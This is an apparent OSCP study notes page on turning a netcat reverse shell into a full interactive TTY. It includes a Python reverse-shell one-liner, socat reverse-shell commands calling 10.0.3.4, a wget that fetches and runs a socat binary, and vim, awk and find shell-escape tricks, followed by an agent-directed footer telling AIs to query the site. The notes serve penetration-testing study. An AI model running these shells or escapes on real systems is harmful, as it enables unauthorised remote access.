# Upgrading shell Netcat is a great tool, but it also has its shortcoming - * Hitting “Ctrl-C”, for instance, drops the entire shell instead of canceling the current command as on a regular terminal shell; * You cannot run interactive commands like su to log into other local accounts or SSH to connect to other hosts; * Text editors like Vim and Nano cannot be used properly to edit files (only non-interactively); * Features like job control, tab complete and command history with the up-arrow are also missing. **To overcome some of these problems we need to switch to an interactive TTY (i.e. terminal) shell.** ## **Different PTY modules** ### Python pty module ``` python -c 'import pty; pty.spawn("/bin/sh")' python3 -c 'import pty; pty.spawn("/bin/sh")' python3 -c 'import pty; pty.spawn("/bin/bash")' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(), *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` ### Perl ``` perl —e 'exec "/bin/sh";' ``` ### Using socat On Kali (listen): ``` socat file:`tty`,raw,echo=0 tcp-listen:4444 ``` On Victim (launch): ``` socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 ``` If not download in Victim: ``` wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 ``` ### Other ways ``` /bin/sh -i echo os.system('/bin/bash') exec "/bin/sh"; ``` ### Related Shell Escape Sequences Vi / Vim ``` :!bash ``` ``` :set shell=/bin/bash :shell ``` awk ``` awk 'BEGIN {system("/bin/bash")}' ``` find ``` find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \ ``` ## **Netcat Magic** 1.First spawn a PTY shell with python or with bash , ``` python -c 'import pty; pty.spawn("/bin/bash")' ``` 2\. Background the process with **Ctrl-z** ![](/files/-MkkAL2eNpt0KmnJzrvV) 3\. Examine the current terminal and STTY info so we can force the connected shell to match it: ``` stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/' ``` The information needed is the size of the current TTY (*“Example: rows 38; columns 116”*) 4\. With the shell still backgrounded, now set the current STTY to type raw and tell it to echo the input characters with the following command: ``` stty raw -echo ``` With a raw stty, input/output will look weird and you won’t see the next commands, but as you type they are being processed. 5\. Next foreground the shell with `fg`. It will re-open the reverse shell but formatting will be off. Finally, reinitialize the terminal with enter button 6\. After the `reset` the shell should look normal again. The last step is to set the shell, terminal type and stty size to match our current Kali window (from the info gathered above) ``` $ export SHELL=bash $ export TERM=xterm256-color $ stty rows 38 columns 116 ``` ![](/files/-MkkBIUGDudcnVQ5AIzG) The end result is a fully interactive TTY with all the features we’d expect (tab-complete, history, job control, etc) all over a netcat connection :) ### **Obtaining a full interactive shell with zsh** **Current kali terminal come with zsh shell so it's important to learn this method as above will not work with zsh shell** 1.Get tty shell with above commands and then background the process with **ctrl+z** 2\. Get the number of rows and columns with ``` stty -a | head -n1 | cut -d ';' -f 2-3 | cut -b2- | sed 's/; /\n/' ``` 3\. To ignore hotkeys in the local shell and return to your reverse shell, enter ``` stty raw -echo; fg # Note: For zsh users it is important to enter this in one line! ``` 4\. Configure your rows and columns ``` stty rows cols ``` 5\. Export term ``` export TERM=xterm-256color ``` 6\. All you need to do now, is reload your shell: ``` exec /bin/bash ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gabb4r.gitbook.io/oscp-notes/shell/upgrading-shell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.